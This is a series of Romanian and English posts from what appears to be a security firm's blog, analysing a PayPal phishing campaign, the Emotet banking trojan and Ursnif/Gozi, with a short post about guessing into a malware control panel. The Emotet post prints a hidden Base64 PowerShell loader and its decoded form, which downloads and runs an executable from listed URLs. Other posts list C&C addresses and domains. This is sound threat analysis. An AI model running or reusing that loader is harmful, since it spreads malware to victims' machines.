marți, 10 martie 2020

Furt de date personale: Cont Paypal + Bancar, Carte de credit, Identitate, Email


Furt de date personale: Cont Paypal + Bancar, Carte de credit, Identitate, Email

Furtul de date, a devenit una dintre cele mai practicate metode ale celor ce vor să facă bani ilegal.
Datele furate pot fi folosite in mai multe moduri, dar in acest articol vom vorrbi despre metoda phishing. Phishing-ul este o inșelătorie ce are loc in mediul online si se bazează pe credibilitatea potențialelor victime, dar și pe lipsa de educație in ceea ce privește siguranța online.
Acesta este un email de tip phishing, ce se presupuna ca vine de la Paypal si notifica utilizatorul ca exista probleme de securitate, cerând mai apoi o serie de date pentru “remedierea problemei”.
Sus se poate observa că a fost marcat ca Foarte Important, ca fiind Personal si cu raspuns de confirmare a primirii. Toate acestea pentru a mari credibilitatea mesajului.
In principiu se cere Confirmarea contului, acesta fiind limitat. Avem indicații pentru toată aceasta operațiune și ne anunța că după incheierea procedurii durează 2 zile până la confirmarea contului….
2 zile in care persoana din spatele operațiunii poate folosi fără probleme datele colectate.
Marcat cu roșu am atașat o parte din ceea ce nu se vede in email, mai exact, faptul că mesajul nu vine de la Paypal ci de la un domeniu oarecare.
Din nou pentru credibilitate redirectionează victima spre 2 pagini de securitate: Un anunț că a fost detectată o activitate anormală pe contul de Paypal si o formă de confirmare a persoanei din spatele calculatorului.
A 3-a pagină este un fals ce imita calea de acces in contul PayPal, unde se cere adresa de email/ telefon și parola.
Dacă observați in partea de sus a imaginilor apare adresa paginii web… si clar că nu are legatură cu platforma PayPal, adresa reala fiind: https://www.paypal.com/
După adaugare datelor de logare victima este direcționată spre alte pagini in care trebuie sa introducă… cam tot ce are. Aceasta campanie de phishing fiind una din cele mai complexe din căta am vazut. Asta, deoarece se atentează datele cartii de credit, datele contului bancar, date de identificare personală.
Prima campanie phishing in care se cere si adaugarea unui al doilea card de credit!
Și pentru a avea garanția că va putea accesa toate aceste cere in plus datele autentificării de siguranța a contului bancar precum și datele de logare pe adresa de email. In cazul in care ceva nu merge, să poată cere acces prin intermediul adresei de email, folosind cartea de identitate, permisul de conducere, pașaportul sau orice alt act a fost trimis de victimă.
Se confirmă faptul că (ti-au luat tot) s-a activat protectia contului si se face redirecționare catre pagian oficială PayPal, unde victima se loghează si totul o sa pară ok, neștiind că tocmai a dat toate datele unei persoane ce desfășoară activitați ilegale.
Cam acesta a fost articolul de astăzi. Sper să fie destul de educativ, incât sa se reducă numărul persoanelor ce devin victime ale furtului de date, bani, identitate.

Dacă aveți probleme și nu sunteți siguri de anumite email-uri importante, nu ezitați să ne contactați: contact@prodefence.ro

Borr Malware – Acces in panoul de control

Acces pe panul de control al unui virus denumit BorrMalware.

Accesul a fost posibil in urma unor analize de securitate cibernetica si descoperirea adresei panoului.

Norocul nostru a fost setarea slaba a unor date de acces, care dupa cateva incercari au permis accesul la panoul hackerului.

Momentan are doar 2 victime, din care unul poate fi chiar al hackerului, in incercarea de testare a virusului…. se obisnuieste!

luni, 9 martie 2020

Emotet – Virus bancar – Prezent pe domenii din Romania

Emotet – Virus bancar – Prezent pe domenii din Romania

Hai sa incepem cu informatii de baza!
Emotet este un virus din categoria Trojan, care are nevoie de acceptul victimei pentru a isi incepe activitatea in noua gazda.
Este un virus bancar, ce are ca scop extragerea de date personale, pentru ca hackerul sa poata utiliza contul sau cardul victimei in scopuri personale.
Daca la inceputuri era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe “gratuite”, acum trimiterea lui se face prin intermediul unor documente ce sunt trimise prin email, iar aceste documente contin o comanda de descarcare si o adresa web, iar virusul este descarcat de acolo si actionand in noua gazda(pc, mobilr etc)
Aceasta metoda este folosita pentru a pacali atat protectia serviciilor de email, cat si viitoarea victima.
La intrarea virusului, cu acceptul victimei, sansele de scapare constau doar in posibilitatea de recunoastere a virusului respectiv de catre antivirus, firewall… in functie de ce are presupusa victima in dispozitiv.
Dar sa trecem la povestea noastra si o sa facem o mica analiza malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una din aceste liste contine doua domenii de Romania.
Se presupune ca sunt controlate de hackeri si folosite pentru a isi gazdui fisierele lor malware.
Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.
Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.
La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante “curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8
Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n “C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc
Comanda folosita de Powershell este ascunsa si criptata:
Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==
Decryptata din Base64
$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�
Decryptata are mai multe informatii interesante:
$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’
Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…
Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?
Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!
Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).
Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.
In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.
Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!
In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.
Tags: , , , , , , , ,

duminică, 3 noiembrie 2019

Fresh Ursnif (GOZI/ ISFB) campaign

Some Russian campaign running over leaked email spreads different kind of malware. Today on Yahoo mail has come some fresh Ursnif with 0 detections. |
The domain used for my email was inactive and there was no file for download, but I found it somewhere else.
In the pictures below will find the research steps:
Was easy to find a sample of malware using the SHA256 (d6c0ca87f712c0633eab5ac020ceaad2e256cd3251808ce7c7b45faf4042123e) on Google.
The .zip file is detected and this may be an advantage for the users IF they are using the Antivirus that have on his database this sample… but this is another discussion…
At this moment the VirusTotal says 18/57.. so is going to be better in a few hours.
Now.. extracting them one by one we have a good encrypted malware named Ursnif (GOZI/ ISFB). This malware is trying to steal baking credentials from his victims and the hacker may have access to the system.
I will not explain the whole process at this time but the way to do that you will find it on the recent post I’ve made:
https://www.prodefence.org/malware-analysis-gozi-ifsb-bank-trojan-aka-ursnif/
Useful links:
Urlscan with samples
VirusTotal .zip
VirusTotal .js
VirusTotal .bin

sâmbătă, 7 septembrie 2019

Malware analysis Gozi IFSB – Bank Trojan aka Ursnif

This is the Gozi IFSB malware, created to steal data & informations from the victims. In the folder you will see all the files needed to create your own malware server.
For this malware analysis I will use an .bin found after google search.
Cyber security - Malware analysis
With this .bin file I will be 2 steps closer for the analysis. I don’t have the .doc/.pdf file with the payload, but the .bin is the downloaded file resulted from the payload.
I will transform the .bin file to infected.exe(10000.exe)!
008c4bd6ee834d113cfc693af0ea90396eaa47e860bcdd567ffd964b57434e1d.bin
MD5: e6d118192fc848797e15dc0600834783
SHA1: 16d5ded68677f4a870423d3fd30da8377a5b2408
Let’s go to security manipulation and creation of the malware on the system. The $LN33 it is exported by the executable, after that will jump to C Runtime Library.
Calling the security_init_cookie for buffer overrun protection to comprommise the system security.
Cyber security - Malware analysis Prodefence SRL
Let’s run the infected file to see his actions!
I see that the explorer.exe has some activiti.
Cyber security - Malware analysis
SC Prodefence SRL
Cyber security – Malware analysis
There I have some movements… let’s go to \Roaming\MIcrosoft\ to see the new folder created ‘BthM300C’.
SC Prodefence SRL
An executable(the same .exe with diffrerent name) created in new folder after runed the infected.exe / D3DCsapi.exe aka 1000.exe
Cyber security - Malware analysis
The Registry.
Cyber security - Malware analysis
Prodefence SRL
Now… the explorer.exe.
24 .dll are suspicious.
That means some of them are from the injection process.
Cyber security - Malware analysis
explorer.exe (2304)  – 52074 – 166.124.148.146.bc.googleusercontent.com.
This is an Google Cloud Platform and the explorer.exe has some connections there.
genesisgrandergh.at
  • Port: 62809, Dst Port: 53
  • Standard query response 0xd314 Server failure
  • ns1.suspended-domain.com
bitsupport.top
  • Standard query response 0xd314 Server failure
  • ns1.suspended-domain.com
carloslimmheklo.at
  • Port: 58097, Dst Port: 53
  • ns1.suspended-domain.com
databasecollection.pw  OK
  • Port: 62809, Dst Port: 53
  • Pubkey: 04b7b8c4d1d482255514ccf90c896acb7b5baaa7208eea67
Name Servers:
  • ns4.sinkhole.ch
  • ns3.sinkhole.ch
  • ns2.sinkhole.ch
  • ns1.sinkhole.ch
Now … becouse I have some extra informations.. I will try to find more infected domains.
The Gozi malware is using friendly websites to infect the visitors, others trojans or payloads included on .doc files, for better security bypass.
Virus Total Report
https://www.virustotal.com/#/file/008c4bd6ee834d113cfc693af0ea90396eaa47e860bcdd567ffd964b57434e1d/detection
sinkhole.ch server hosting malware
https://www.malwareurl.com/ns_listing.php?ns=ns2.sinkhole.ch
https://securitytrails.com/list/ns/NS1.SINKHOLE.CH?ref=abuseipdb
About Gozi(Ursniff)
https://www.secureworks.com/research/gozihttps://www.csoonline.com/article/2123315/identity-theft-prevention/inside-the-global-hacker-service-economy.html?page=2